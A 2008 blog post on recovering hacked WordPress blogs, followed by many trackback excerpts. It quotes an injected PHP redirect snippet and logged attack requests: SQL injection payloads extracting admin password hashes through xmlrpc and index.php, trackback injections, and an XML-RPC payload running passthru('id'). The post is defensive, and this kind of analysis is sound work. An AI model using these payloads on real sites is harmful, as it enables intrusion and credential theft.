Remember a few weeks ago there was all that noise about WordPress blogs getting hacked? Remember how everyone was urged to upgrade their blogs. You did upgrade didn’t you? No? It was inevitable that you’d be hacked. If you haven’t been hacked yet, it’s only a matter of time.
Unfortunately for some who did upgrade, it was too late. The hacker slimeballs may have known about the security issues before we did and went about their merry way breaking into blogs and websites, grabbing usernames and passwords, and planting backdoor scripts to log them in again at a later date.
That’s how even diligently upgraded blogs were hacked. The bad guys got there before you.
In the last week the hackers have started again. There is no zero day WordPress exploit. There is no evidence that version 2.5.1 of WordPress is vulnerable to any exploit at this time. They’re using the old exploits all over again. This time they’re redirecting hits from Google to your blog. Those hits are instead being redirected to your-needs.info and anyresult.net
If you’ve been hacked
- Upgrade to the latest version of WordPress.
- Make sure there are no backdoors or malicious code left on your system. This will be in the form of scripts left by the hacker, or modifications to existing files. Check your theme files too.
- Change your passwords after upgrading and make sure the hacker didn’t create another user.
- Edit your wp-config.php and change or create the SECRET_KEY definition. It should look like this, but do not use the same key or it won’t be very secret, will it?
define(‘SECRET_KEY’, ‘1234567890′ );
Hidden Code
The bad guys are using a number of ways to hide their hacks:
- The simplest way is hiding their code in your php scripts. If your blog directory and files are writable by the webserver then a hacker has free reign to plant their code anywhere they like. wp-blog-header.php seems to be one place. Theme files are another. When you upgrade WordPress your theme files won’t be overwritten so make sure you double check those files for any strange code that uses the
eval()command, orbase64_decode(). Here’s a code snippet taken from here:
< ?php $seref=array("google","msn","live","altavista","ask","yahoo","aol","cnn","weather","alexa");$ser=0; foreach($seref as $ref) if(strpos(strtolower($_SERVER['HTTP_REFERER']),$ref)!==false){ $ser="1"; break; }
if($ser=="1" && sizeof($_COOKIE)==0){ header("Location: http://".base64_decode("YW55cmVzdWx0cy5uZXQ=")."/"); exit; }?>< ?php
Another hack adds different code to your php files. Look for k1b0rg or keymachine.de in your php scripts and remove that offending code if you find it.
- Check your .htaccess file in the root of you blog. If you’ve never edited it, it’ll should look like this:
# BEGIN WordPress
<ifmodule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</ifmodule>
# END WordPressThat file may have this chunk of code too which is to do with the uploader:
<ifmodule mod_security.c>
<files async-upload.php>
SecFilterEngine Off
SecFilterScanPOST Off
</files>
</ifmodule> - They’re also uploading PHP code disguised as jpeg files to your upload directory and adding those files to the activated plugins list. This makes it harder to find them, but not impossible:
- Open PHPMyAdmin and go to your blog’s options table and find the active_plugins record.
- Edit that record. It’s a long line. Scroll through it and you’ll find an entry that looks like
../uploads/2008/05/04/jhjyahjhnjnva.jpg
. Remove that text, and make sure you remove the serialized array information for that array record. If that’s beyond you, just delete the active_plugins record and reactivate all your plugins again. - Check your uploads directory for that jpg file and delete it.
- This Youtube video shows how to do that. I don’t think there’s any urgent need to remove the rss_* database record but it won’t hurt to do it.
Change Your Passwords
Once you’ve upgraded and verified that your install is clean again you must do the following:
- Change the passwords of all users on your system.
- Make sure the hacker hasn’t added another user account he can use to login again.
Stop the bad guys
One way of stopping the bad guys before they’ve done any major damage is by doing regular backups and installing an intrusion detection system (IDS).
- I use Backuppc to backup all my servers every night, and a simple MySQL backup script to dump the database daily.
- The first IDS that springs to mind is Tripwire but there are many others. I just installed AIDE to track changes on this server. What it does is give me a daily report on files that have changed in that period. If a hacker has changed a script or uploaded malicious code I’ll get an email within a day about it. It does take some fine tuning, but it’s easy to install on Debian systems (and presumably as easy on Ubuntu and Red Hat, and even Gentoo..):
# apt-get install aide
# vi /etc/aide/aide.conf.d/88_aide_web
# /usr/sbin/aideinitIn the configuration file above I put the following:
/home/web/ Checksums
!/home/www/logs/.*
!/home/web/public_html/wp-content/cache/.*
!/home/web/.*/htdocs/wp-content/cache/.*That will tell AIDE to track changes to my web server folders, but ignore the logs folder and cache folders.
Please Upgrade
There is absolutely no reason not to upgrade. WordPress is famous for it’s 5 minute install, but it takes time and effort to maintain it. If you don’t want the hassle of upgrading, or don’t know how to maintain it, why not get a hosted WordPress account at WordPress.com? Does the $10 you make from advertising every month really justify the time it takes to make sure your site, your writing, your photos and other media are safe? This isn’t an advert for WordPress.com, go with any blogging system you like, but don’t make life easy for the scum out there who’ll take over your out of date software and use it to their advantage.
Help a friend
Check the source code of the blogs you read. The version number in the header will quickly tell you if their version of WordPress is out of date or not. Please leave a comment encouraging them to upgrade! The version number looks like this:
<meta name=”generator” content=”WordPress 2.5.1″ /> <!– leave this for stats –>
What does a hack look like?
I perform logging on one of my test blogs and I come across all sorts of malicious attempts to break in. Attackers use dumb bots to do their bidding so a website will be hit with all sorts of attacks, even for software that’s not installed. The bots are so dumb they’ll even come back again and again performing the same attacks.
Here’s what I call the “ekibastos attack”. It happens over a number of requests and I’ve seen it come from 87.118.100.81 on a regular basis. It uses a user agent called, “Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)” which strangely enough doesn’t show up on Google at all right now.
- First the attacker visits your Dashboard, and then without even checking if that was successful, he tries to access wp-admin/post.php several times using HEAD requests.
- Then he POSTs to wp-admin/admin-ajax.php with the following POST body:
POST: Array
(
[cookie] => wordpressuser_c73ce9557defbe87cea780be67f9ae1f=xyz%27; wordpresspass_c73ce9557defbe87cea780be67f9ae1f=132;
) - When that fails, he grabs xmlrpc.php.
- He then POSTs to that script, exploiting an old and long fixed bug. Here’s a snippet of the data.
HTTP_RAW_POST_DATA: <?xml version=”1.0″?>
<methodCall>
<methodName>system.multicall</methodName>
<params>
<param><value><array><data>
<value><struct>
<member><name>methodName</name><value><string>pingback.extensions.getPingbacks</string></value></member>
<member><name>params</name><value><array><data>
<value><string>http://ocaoimh.ie/category/&post_type=%27) UNION ALL SELECT 10048,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4 FROM wp_users WHERE ID=1%2F*</string></value>
</data></array></value></member></blockquote>
- That fails too so the query is repeated with similar SQL.
<value><string>http://ocaoimh.ie/category/&post_type=%27) UNION ALL SELECT 10000%2Bord(substring(user_pass,1,1)),2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4 FROM wp_users WHERE ID=1%2F*</string></value>
- Then he tries a trackback:
URL: /wp-trackback.php?tb_id=1
POST: Array
(
[title] => 1
[url] => 1
[blog_name] => 1
[tb_id] => 666666\’
[1740009377] => 1
[496546471] => 1
) - And another trackback:
URL: /wp-trackback.php?p=1
POST: Array
(
[url] => ekibastos
[title] => ekibastos
[excerpt] => ekibastos
[blog_name] => +AFw-\’)/*
[charset] => UTF-7
) - Before finally going back to xmlrpc.php with this POST request:
<?xml version=”1.0″?>
<methodCall>
<methodName>pingback.ping</methodName>
<params>
<param><value><string>k1b0rg’ icq: 76-86-20</string></value></param>
<param><value><string>http://ocaoimh.ie/?p=k1b0rg#ls</string></value></param>
<param><value><string>admin</string></value></param>
</params>
</methodCall> - In between, he also tries the following GET requests:
GET /index.php?cat=%2527+UNION+SELECT+CONCAT(666,CHAR(58),user_pass,CHAR(58),666,CHAR(58))+FROM+wp_users+where+id=1/* HTTP/1.1
GET /index.php?cat=999+UNION+SELECT+null,CONCAT(666,CHAR(58),user_pass,CHAR(58),666,CHAR(58)),null,null,null+FROM+wp_users+where+id=1/* HTTP/1.1 - Thankfully I upgraded and all those attacks fail.
Those requests have been hitting me for months now with the latest happening 2 days ago. If that doesn’t convince you that you must upgrade and check your website, I don’t know what will.
PS. For completeness, here’s another common XMLRPC attack I see all the time. Ironically, this actually hit my server from 189.3.105.2 after I published this post.
<?xml version="1.0"?>
<methodCall>
<methodName>test.method
</methodName>
<params>
<param>
<value><name>','')); echo
'______BEGIN______';
passthru('id');
echo
'_____FIM_____';
exit;/*</name></value>
</param>
</params>
</methodCall>
Edit: Tripwire url fixed, thanks Callum
PS. If your site has been hacked, try the WordPress Exploit Scanner which will try to find any modified files and suspicious database records.
You might also like
- WordPress Exploit Scanner 0.1
My previous post about hacked WordPress sites caused Donnacha to- Exploit Scanner 0.5
The WordPress Exploit Scanner has been updated, with lots of- Catch website file changes with AIDE
A week ago I suggested installing AIDE to track changes
If you like this post then please subscribe to my full RSS feed. You can also click here to subscribe by email. There are also my fabulous photos and funny videos to explore too!
[...] Last Update: Donncha, explaining the whole thing. [...]
[...] Did your WordPress site get hacked? is a great post by Donncha examining the latest “popular” hack(s), how to prevent them and/or how to recover. [...]
[...] According to Donncha, 2.5.x is not vulnerable to this, but I’ve personally seen a number of 2.5.x sites that are [...]
[...] to Donncha O Caoimh of Automattic, this exploit took advantage of a vulnerability that has been fixed in the latest stable version of WordPr…. As he points out, although 2.5.1 sites have succumbed to the attack, the evidence so far is that [...]
[...] do some research before you post: Did your WordPress site get hacked? All those wankers who claim that they were hacked even when they had upgraded to 2.5.1 were lying [...]
[...] hacked to redirect search engine queries. So I spent this morning working on a post about that hacking issue. No wonder we were late for the photowalk this [...]
[...] thread http://www.netpond.com/blogging-foru…idespread.html This is the official solution Did your WordPress site get hacked? This is for laughing at wankers WordPress › Support Wordpress Hacked and Redirected … [...]
[...] Diesmal gehen die kriminellen Cracker nicht so vor, dass sie das Blog sichtbar übernehmen, sondern sie leiten nur die Google-Suchergebnisse auf ihre kriminellen Spamseiten um. Aber die tolle Empfehlung, dass man doch einfach die aktuelle WP-Version nehmen soll, um etwas [...]
[...] another source of concern might be hacking. I wouldn’t want to let a hacker wander through my articles database and delete them all. The [...]
[...] Article: Holy Shmoly! Did your WordPress site get hacked? [...]
[...] articolo è stato scritto da Donncha O Caoimh proprio ieri, 8 giugno 2008. Mi è parso di assoluto interesse e vi propongo, dietro il permesso personale dell’autore, [...]
[...] some general advice on protecting wordpress from hacks and attacks. It contains some good piece of information + software that you can use to [...]
[...] questa parte vi lascio all’articolo originale e alla traduzione di aldolat perchè nella stragrande maggioranza dei casi non gestite da voi il [...]
[...] los foros de WordPress, ninguna persona con relación a la empresa ha emitido palabra alguna. Sólo Donncha ha informado que la rama 2.5.X no es vulnerable, aunque varios bloggers hemos dicho y seguimos diciendo lo contrario, debido a que nos hemos [...]
[...] Donncha (wish your girlfriend was hot like me(sorry)) O Caoimh well known wordpress developer has made a great post about how sites are hacked and also what to look for. [...]
[...] you upgrade your blog immediately when a new version is released, your site might already have been hacked. Therefore, if there are known WordPress vulnerabilities, old or otherwise, your blog is [...]
[...] (June 10): Check out this very helpful post by Donncha O [...]
[...] are taken to remove it. Donncha, one of the WP devs, attempts to allay everyone’s fears with this post explaining how to spot a hack and a few common sense tips on how to keep your WordPress site [...]
[...] Did your WordPress site get hacked? Did your WordPress site get hacked? (tags: wordpress security blogs hacking tutorials) [...]
[...] Did your WordPress site get hacked? :: Holy Shmoly – a really good overview of Wordpress blogs being hacked with some tips to help you combat any damaging effects. [...]
[...] on 2.5.0 or less, you should really upgrade. (hopefully bold pink writing will get your attention) Did your WordPress site get hacked? __________________ my sites :irish poker / irish jobs / seo faq / advertise jobs free / green [...]
[...] WP site hacked? Holy Shmoley knows what to do. [...]
[...] your WordPress site get hacked? June 11, 2008 — htaccess Did your WordPress site get hacked? Remember a few weeks ago there was all that noise about WordPress blogs getting hacked? Remember [...]
[...] If you want to be sure that those attackers responsible for such Wordpress exploit haven’t gotten inside your Wordpress blog, immediately check for the guides posted here. [...]
[...] is a reprint of an article by Donncha O Caoimh, the WordPress Guru. Remember a few weeks ago there was all that noise about WordPress blogs [...]
[...] may not tip off the blog owner in any way. The security vulnerabilities in Wordpress have led to automated attacks across a very large number of blogs, often without site owners realizing what is happening. If you are currently not running [...]
[...] owner in any way. The security vulnerabilities in Wordpress have led to automated attacks across a very large number of blogs, often without site owners realizing what is happening. If you are currently not running [...]
[...] WP site hacked? Holy Shmoley knows what to do. [...]
[...] But if you managed to find this article first, please (PLEASE!!!) head over to their blog and read the full article on how to protect your site from the [...]
[...] gives WordPress users a reminder to upgrade our WordPress blogs in light of possible security risks. Donncha know you have to upgrade WP!? Okay, bad pun. At any [...]
[...] i stosowanych przez hakerów metodach oraz o sposobach rozpoznania i usuwania zagrożenia bardzo dokładnie pisze Donncha O Caoimh, link do jej artykułu jest też ciągle dostępny na pulpicie administratora [...]
[...] More to read, Source: here [...]
[...] Did your Wordpress get hacked? [...]
[...] というのが6ヶ月前だった。ところが5月に同じことがまた起こったのだ。今度は別の新しいセキュリティホールが原因で、これもWordpressがアップデートで対処できる数日前に起こった。問題は、ほとんどのブログオーナーがブログをターゲットにするハッカーの脅威に気付いていないということだ。というのも、ブログオーナーに何の警告もしないで攻撃することがあるからだ。Wordpressのセキュリティの脆弱性が、非常に多数のブログに対する自動化された攻撃を引き起こした。ときとして、サイトオーナーは何が起こっているかわかっていない。 [...]
[...] more information on the code snippets used by hackers you can check detailed blogs dealing with the issue. In the meantime keep on [...]
[...] Did your WordPress site get hacked?Mijne niet denk ik… [...]
[...] vulnerabilidades de seguridad en Wordpress han dado lugar a ataques automatizados a través de una número muy elevado de los blogs, a menudo sin que los propietarios de sitios la realización de lo que está [...]
[...] Did your WordPress site get hacked? (tags: wordpress security) [...]
[...] seen a lot of sites (Shoemoney, Digital Point, Ocaoimh) reporting about a Wordpress hack that will “steal” your search engine traffic . As [...]
[...] Did your WordPress site get hacked? 2. Make Money Online: 100+ Tools and Resources 3. Win Friends and Clients for Joint Ventures – [...]
[...] besar situs Anda telah dikendalikan hacker. Untuk mencari tahu apakah blog Anda masih aman, ikuti instruksi di situs ini. Karena popularitasnya sebagai platform blogging, WordPress telah menjadi target utama para hacker [...]
[...] Holy Shmoly vous montre ce qu’il faut faire si votre blog se fait “hacker”… Toujours intéressant et à bookmarker absolument ! [...]
[...] alle filer i det WordPress tema du bruger, da disse ikke bliver opgraderet. Det er som regel her at skjult kode bliver lagt ind, hovedsageligt med kommandoerne eval() og base64_decode(). Kig efter kode der ser [...]
[...] This week a public exploit was discovered that could make your blog redirect to another site if clicked on via search engines. The hack places a piece of code in your header file and enables another site to take control of where visitors get redirected to based on their preference. You can make sure your blog hasn’t already been comprised by checking your header file for this code. [...]
[...] update them. I learned about this through Chris Jacobson, who linked to another blog called Holy Shmoly that not only talked about blogs getting hacked, but broke it down to explain [...]
[...] 16. Eumaeus, or Why are there so few Academic Bloggers? In the Odyssey, Odysseus returns home to find his home besieged, which, reunited with Telemachus, he plots to free; in Ulysses, Bloom and Stephen walk from Nighttown to a Cabman’s shelter west of the Custom House where they drink coffee and chat with a sailor, and Bloom expostulates to a prostitute on the perils of vice. (Yet again, consider Beijing, Chapter 14). It is no exaggeration to say that Ulysses has spawned an entire academic industry that is showing every sign of redoubling, but very little of it is in blogs. Yet, Crooked Timber has been continually surprised over the years about how many academics fail to take advantage of the Web as a medium for disseminating their work, and later gives sound advice to a PhD student wondering whether to embark on a blog; of course, one of the keys is to choose a good domain name, especially when they are increasingly scarce. Damien Mulley has good advice for all such bloggers on beating procrastination and writers block; and Holy Shmoly! (Donncha O Caoimh) has good advice on beating Wordpress hackers. [...]
[...] week ago I suggested installing AIDE to track changes on your server in case it had been hacked. I think AIDE Is so [...]
[...] hacker. Untuk mengetahui sama ada blog anda masih selamat, anda mungkin perlu ikuti perbincangan di SINI. Kerana platform blogging wordpress paling diminati, dan dikendalikan untuk tujuan SEO, traffic [...]
[...] Did your WordPress site get hacked? – More info about the structure of the Wrdpress attacks and how to prevent them, written by one of the Wordpress people. [...]
[...] vous conseille de vous rendre sur Holy Schmoly qui a écrit un post très complet à ce sujet. (en anglais malheureusement). Elle y parle des [...]
[...] If you use wordpress make sure you upgrade the version. I snoozed and my site is toasted. I hate the [...]
[...] WP site hacked? Holy Shmoley knows what to do [...]
[...] famoso Donncha descreve várias delas no post Did Your WordPress Site Get Hacked?, junto com as soluções para cada [...]
[...] Did your WordPress site get hacked? Do you know what to do in such a case? Read and learn from Did your WordPress site get hacked? [...]
[...] you’d be hacked. If you haven’t been hacked yet, it’s only a matter of time…..(click to read more) If those quoted excerpts are not sufficient, Mr/Ms. WordPress Blogger, please do yourself a [...]
[...] my theme. Frustrated, I went to some of my friends on the WordPress team, and they pointed me at a great article from Donncha O Caoimh: Unfortunately for some who did upgrade, it was too late. The hacker slimeballs may have known [...]
[...] my theme. Frustrated, I went to some of my friends on the WordPress team, and they pointed me at a great article from Donncha O Caoimh: Unfortunately for some who did upgrade, it was too late. The hacker slimeballs may have known [...]
[...] I can’t believe my shit got hacked. I thought that only happened in the movies or to big corpo types. I thought some thing might go [...]
[...] Donncha O Caoimh posted a 6/8/2008 note about detecting whether your WP blog has been hacked, and some steps on dealing with it. [...]
[...] me however is one of the comments that i read at his website that points me to this other website, holy shmoly!, specifically, how secured is our wordpress?. Apparently there are some security flaws on previous [...]
[...] info here and here. On this site it took the form of links added into the template files, and with a display: [...]
[...] blogs running older versions of WordPress were hacked. Peter offers a way to have your site notify you when things are [...]
[...] previous post about hacked WordPress sites caused Donnacha to ask, After your last post on this subject, I was thinking that it would be a [...]
[...] old versions of the Wordpress script are vulnerable to various hacker attacks, Donncha published an article on the same topic few days back. Today he has released a plugin called Wordpress Exploit Scanner, [...]
[...] couple of weeks ago an article about hacked Wordpress sites came up in my Wordpress admin dashboard. I hadn’t been paying attention to all of the noise [...]
[...] 自WordPress 2.5发布以来,WordPress的开发blog和论坛里经常能看到关于WordPress安全性的讨论文章:1、2。其中谈到的黑客通常都是在blog上留下后台程序,或其他隐藏的恶意链接等。WordPress Exploit Scanner正是用于扫描WordPress是否被黑客留下了这些邪恶的东东。当然有些黑客爱删东西的,那就没办法了。 [...]
[...] a blogs que utilitzen WordPress que va fer que bastants d’aquests blogs quedessin inactius; Donncha O Caoimh va donar una sèrie de passos per saber si el teu blog havia estat atacat. Ara acaba de [...]
[...] website WSOS). It appears that hackers gained access to numerous out-of-date wordpress blogs (details and fixes here) and used wordpress to send many, many spam [...]
[...] Changes Notifications for Your Wordpress Blog on Linux Did your WordPress site get hacked? Three tips to protect your WordPress installation 10 Ways to Secure your Wordpress Install [...]
[...] I had been rather diligent in updating software but fell into a lull after 2.0.3 of WordPress. I rarely, if ever, check my stats so I’m not sure how long it has been happening, but something got hacked. If you run WordPress, check your stats and then go here. [...]
[...] on the site (it never was required) and did everything that the article I linked to yesterday from Holy Schmoly recommended. The hardest thing was to change the database table prefixes and while I found a script [...]
[...] also has a good technical analysis of the exploit in his post – Did your WordPress site get hacked? And JD posted how to manually get rid of the hacks – Patching the WordPress AnyResults.Net [...]
[...] upgraded the site to the latest version of WordPress. Unfortunately there was a vulnerability in the older version I was using which led to it being hacked by a bot. About 100k of links to a dodgy pharmacy site had [...]
[...] Did your WordPress site get hacked? deals with the latest exploit of the WordPress and how to fix it. [...]
[...] my RSS feed or by Email. Thanks for visiting!WordPress blogs are starting to get hacked in greater numbers lately. The problem is getting serious enough that the WordPress podcast recently addressed out of [...]
[...] erfahren musste. Eine ziemlich gute Anleitung zum richtigen Vorgehen findet sich zum Beispiel bei Holy Shmoly!. von BloggingTom, abgelegt unter BloggingPermalink | Trackback URI print it! | yigg it! | wong [...]
[...] empfehle ich natürlich meinen Retter BloggingTom (danke vielmals an dieser Stelle) und Holy Shmoly (englische Anleitung zum beheben von [...]
[...] on how to solve it and my head is about to burst. Lucky this site explains things clearer – Is your Wordpress hacked? They’re also uploading PHP code disguised as jpeg files to your upload directory and adding [...]
[...] code was placed in my theme’s header file, base64 encoded just as the article said it would [...]
[...] Did Your WordPress Site get Hacked? [...]
[...] the link given by Genkisan, I found this useful tutorial on ‘Did your Wordpress site get hacked?‘ They’re also uploading PHP code disguised as jpeg files to your upload directory and [...]
[...] If you noticed the site looking funny Sunday morning, it’s because I was reinstalling the blog software that I use, which is called WordPress. Some time in the last month or two this blog was hacked, through a vulnerability in WordPress that is described here. [...]
[...] where my blog is hacked by unknown attacker or two, I become a little bit paranoid. Thanks to Holy Shmoly, there is somewhat a definite guide on how to ‘harden’ your wordpress [...]
[...] Nik Cubrilovic wrote on TechCrunch about how a blog of his was hacked in June. He offers some interesting observations. For practical, WordPress-specific advice, there are a bunch of tips here and Donncha O Caoimh offers a technically-minded look at some of the issues. [...]
[...] Did your WordPress site get hacked? (tags: wordpress security) [...]
[...] Doncha’s excellent (and more recent) write-up of how to deal with a hacked WordPress installat… [...]
[...] One of the Wordpress developers posts: Did your WordPress site get hacked? [...]
[...] links from Kulpreet include WordPress Security White Paper, and “Did your WordPress site get hacked?” featuring samples of what a hacked site would look like. Digg it Add to del.icio.us [...]
[...] Did Your Wordpress site Get Hacked? >> Holy Shmoly! [...]
[...] Scanner 0.1 has been released, in response to a comment on a recent thread about old versions of WordPress sites being hacked. You may have spotted this in your WordPress dashboard. Problem is, it only works for v2.5.1+, so [...]
[...] Dat leek mij wel heel erg sterk, maar het was wel waar. Een hacker heeft een exploit in Wordpress gevonden en maakt daar nu dankbaar van gebruik. Wat er gebeurt is dat er een (onzichtbaar) commentaar aan de tekst van een link in een blogpost wordt toegevoegd. Op het moment dat je vervolgens de blogpost leest, probeert de browser de link te volgen. De link verwijst naar een gemene site ergens in China, waardoor in theorie de lezer een virus (Trojan Horse) kan krijgen. Meer informatie over de “exploit” is op de Wordpress site te vinden. Meer informatie (inclusief een script waarmee je de Wordpress installatie kunt controleren op exploits en hacks) kun je vinden op deze site. [...]
[...] {from bloggerguide.net} {from ocaoimh.ie} [...]
[...] will make it less likely. If you ever find yourself in the same situation as me check out this post. I found it very [...]
[...] read about this and took steps to recover my blog. The old theme is the culprit. I got rid of it and am upgrading [...]
[...] the most helpful article was Did Your Site Get Hacked. Why, yes it did. You might also consult Wordpress Security [...]
[...] suspect that this site was hacked by bots. I think that the culprit is an old plugin I never updated. That, and the security was [...]
[...] links A blog post about securing your wordpress blog How to upgrade your wordpress [...]
[...] links</em>:</strong> <a href=”http://ocaoimh.ie/2008/06/08/did-your-wordpress-site-get-hacked/”>A blog post about securing your wordpress blog</a> <a [...]
[...] post that tells you how to know if your Wordpress blog has been hacked, and what to do about it: Holy Shmoly!. GREAT POST! Bookmark [...]
[...] my site had been hacked and had a stream of links to Anti-Virus sites above the top header. After a quick Google it turned out to be an easy fix, but it reminded me of my former days of scanning code for a [...]
[...] Vancouver Techie blogger Jan Karlsberg also has some advice for Wordpress bloggers (and companies running their websites off the Wordpress platform) to protect themselves with a little code review. He knows, because his Wordpress blog got hacked – and he fixed it. Some other Wordpress anti-hack tips here. [...]
[...] Most of the fixes are well beyond the scope of this blog. However, if you are mysql and php literate, you may want to start with this post at the wordpress.org forums and read Doncha’s post on Did Your Wordpress Site Get Hacked? [...]
[...] Did your WordPress site get hacked? – Donncha [...]
[...] Did your WordPress site get hacked? [...]
[...] WP site hacked? Holy Shmoley knows what to do. [...]
[...] Donncha (one of the original Wordpress founders, remember that name in your first blogroll?) for catching an insidious trick that’s inherent in some Wordpress templates. Irrelevant links on your site can drain off your [...]
[...] Blogs I look after got hacked again by an “online pharmacy”. Of course I’m not the only one. It was the second hack with 3 months of this WordPress [...]
[...] Blogs I look after got hacked again by an “online pharmacy”. Of course I’m not the only one. It was the second hack with 3 months of this WordPress [...]
[...] Holy Shmoly: Did Your Website Get Hacked? [...]
[...] found an article by Donncha, Did your WordPress site get hacked?. Fcuking A for [...]
[...] Did your Wordpress site get hacked? Malicious script injection on my [...]
[...] 1) reset your admin password by following the instructions above 2) immediately upgrade to the newest version of Wordpress 3) backup the database used for your blog. (usually you do this when upgrading, but if you’re a frequent blogger, backup more frequently. 3) create a new password that isn’t easy to break. include odd characters like ! +))^& and throw in an occasional upper case letter along with numbers. 4) check out the excellent suggestions at http://ocaoimh.ie/2008/06/08/did-your-wordpress-site-get-hacked/ [...]
[...] these hacking problems and how to further protect yourselves from it, please read the detailed article made by Donncha O Caoimh, an Irish WordPress developer. In the meantime, I’ll be busy backing [...]
[...] these hacking problems and how to further protect yourselves from it, please read the detailed article made by Donncha O Caoimh, an Irish WordPress [...]
[...] Googling a number of times, I found this post which I think explains what happened to my site. I tried updating to the newest version but still, [...]
[...] til blogg, ftp og database. For andre WordPress bloggere vil jeg anbefalte å ta en titt på dette innlegget. (Takk til Kristin for linken via [...]
[...] http://ocaoimh.ie/2008/06/08/did-your-wordpress-site-get-hacked/ [...]
[...] seperti di sini atau di sini. Atau ada tutorial lain lebih lengkap untuk kasus yang agak beda di sini atau reference dari blog ShoeMoney dengan kasus hampir mirip di sini dan lain-klain tentu di [...]
[...] those of you who want more: Read an interesting article about a Wordpress blog being [...]
[...] installs : If you’re affected by this, fix the issue, and then read Hardening Wordpress and Did your Wordpress Site get Hacked – both of which give a lot of starting points for research into how you can stop this happening [...]
[...] Click here to read post [...]
[...] du dig hotad? Besök Holy Shmoly! för mer [...]
[...] you’re affected by this, fix the issue, and then read Hardening Wordpress and Did your Wordpress Site get Hacked – both of which give a lot of starting points for research into how you can stop this happening [...]
[...] Actualización 17-03-09: Todos los problemas han sido arreglados. Finalmente NO fue un fallo de Wordpress, sino que otra de las personas que comparte el servidor con nosotros instaló algún tipo de aplicación de dudosa seguridad y muy probablemente eso permitió que se accediera al servidor y añadieran código malicioso a muchos de los archivos php de mi instalación de Wordpress. La solución a todo esto me la han facilitado desde el hilo que abrí en el foro de soporte técnico de Wordpress, por lo que dejo aquí en el enlace para todo aquel al que pueda servirle de ayuda en caso de haber padecido este mismo ataque. Concretamente, la web que proporciona las soluciones es: http://ocaoimh.ie/2008/06/08/did-your-wordpress-site-get-hacked/ [...]
[...] BlogSecurity is a blog that provides information about maintaining Wordpresss Security. Holy Shmoly has a great blog post entitled “Did your Wordpress Blog Get Hacked?” and it provides a [...]
[...] i miei siti: “Exploit Redirects Googlebot to Malware Sites (Bablo me uk)” e “Did your WordPress site get hacked?“, piuttosto [...]
[...] this was quite a challenging task as I wasn’t sure what or where to look. I found this article which gave a few pointers. I have yet to follow all the instructions but this is what I’ve [...]
[...] you’re affected by this, fix the issue, and then read Hardening Wordpress and Did your Wordpress Site get Hacked – both of which give a lot of starting points for research into how you can stop this happening [...]
[...] İlk olarak wordpressin son sürümünü indirin ve sistem dosyalarını bir güzel yenileriyle değiştirin. Sonra sonradan eklenen dosylardaki (tema, eklenti gibi) zararlı kodları temizleyin. Web siteniz ile en ilgili olandan başlayıp bütün şifrelerinizi değiştirin. Kaliteli ve kullanışlı şifreleri üretmeyi öğrenin. Bu biraz ironik ama windowsunuzu güvenli tutun. Neyseki bu olay bir tek benim başıma gelmemiş. Eğer sizde bu durumla baş başa iseniz aşağıdaki linklerden faydalanabilirsiniz ; http://wordpress.org/support/topic/263085 http://wordpress.org/support/topic/261886 http://ocaoimh.ie/2008/06/08/did-your-wordpress-site-get-hacked/ [...]
[...] You can read more about .htaccess from here. I checked my blog and it was working fine. CallingAllGeeks was up and running again. So, in all it [...]
[...] http://ocaoimh.ie/2008/06/08/did-your-wordpress-site-get-hacked/ [...]
[...] være på bloggen din, kan du gå igjennom denne listen. Vil du vite hvordan en hacker jobber, er denne siden litt grei å lese, men dog veldig [...]
[...] enough as we’re all vulnerable here. If you’re more tech savvy, here’s a post by Holy Shmoly! which tacles hacked php scripts on WordPress and how they look [...]
[...] Open source Exploits The open source platforms are now an easy target for hackers to exploit and use the malicious codes. The last thing that we need is a hacked site with a very good SERP. If you are interested in a serious article this is the place to go. http://ocaoimh.ie/did-your-wordpress-site-get-hacked/ [...]
[...] spam. No estoy segura de haber limpiado todo lo que tenía que limpiar. Pero hice lo que pude. Aquí hay más información para verificar si tienen el mismo problema. (Tu no Javi, ya confirme que no tuvieras el mismo [...]
[...] Did your WordPress site get hacked? [...]
[...] Well, it was clearly a bad news : the site ajaxplorer.info was hacked during on the 13 july 2009, naturally just the night before an important gig, so I had to put it down for a few days. But the good news is that it had nothing to do with the AjaXplorer installed on the server, but it was a wordpress security problem. My fault, i had not updated the wordpress install, and I will right now subscribe the wordpress rss feed telling urging to upgrade when they find a problem. For those using wordpress, have a look here if you don’t have updated already : http://ocaoimh.ie/did-your-wordpress-site-get-hacked/ [...]
[...] Did your WordPress site get hacked? [...]
[...] Found another older post, but more good suggestions there. For example, I did review my .htaccess file and found it a bit [...]
[...] this hack news from June 2008 or March 2007 But this news .. news .. news .. news [...]
[...] recently, I followed some of the steps mentioned by Jaypee, Donncha O Caoimh and the WP [...]
[...] Did your Wordpress site get hacked? [...]
[...] advice: Holy Shmoly! and My Digital [...]
[...] http://ocaoimh.ie/did-your-wordpress-site-get-hacked/ [...]
[...] How To Completely Clear Your Hacked WordPress Installation Hardening WordPress Did Your WordPress Site Get Hacked? 20 WordPress Security Plugins (don’t overdo it, though) Share this on del.icio.usDigg this!Share [...]
[...] you think you’ve been hacked, I’ve spotted a couple of useful guides to dealing with the aftermath. Wordpress, php hack, php, security, [...]
[...] went to Wordpress support for suggestions, and found a few helpful links (Lorelle)(Donncha) I learned from Lorelle - btw, everyone who uses wordpress should know Lorelle!- that [...]
[...] Holy Shmoly recommends keeping updated to the latest version of wordpress to protect against hackers. In addition to that, you should also change your passwords, remove any other users, change your wordpress config “secret key” and delete any malicious codes left by the hacker which may allow them to get in again in future. If you’re like me and have no idea how to find malicious scripts, Holy Shmoly also explains how you can identify and remove them. [...]
[...] Did your WordPress site get hacked? [...]
[...] as well go all the way and have longer (and more complicated) passwords created. Good References http://ocaoimh.ie/did-your-wordpress-site-get-hacked/ http://enthusiasm.cozy.org/archives/2010/01/argh-blog-hacked [...]
[...] http://ocaoimh.ie/did-your-wordpress-site-get-hacked/ http://forum.kaspersky.com/lofiversion/index.php/t104035.html [...]
[...] Did your Wordpress Site get hacked is a good pointer to fixing things. It is pretty insidious what can happened: [...]
[...] http://ocaoimh.ie/did-your-wordpress-site-get-hacked/ [...]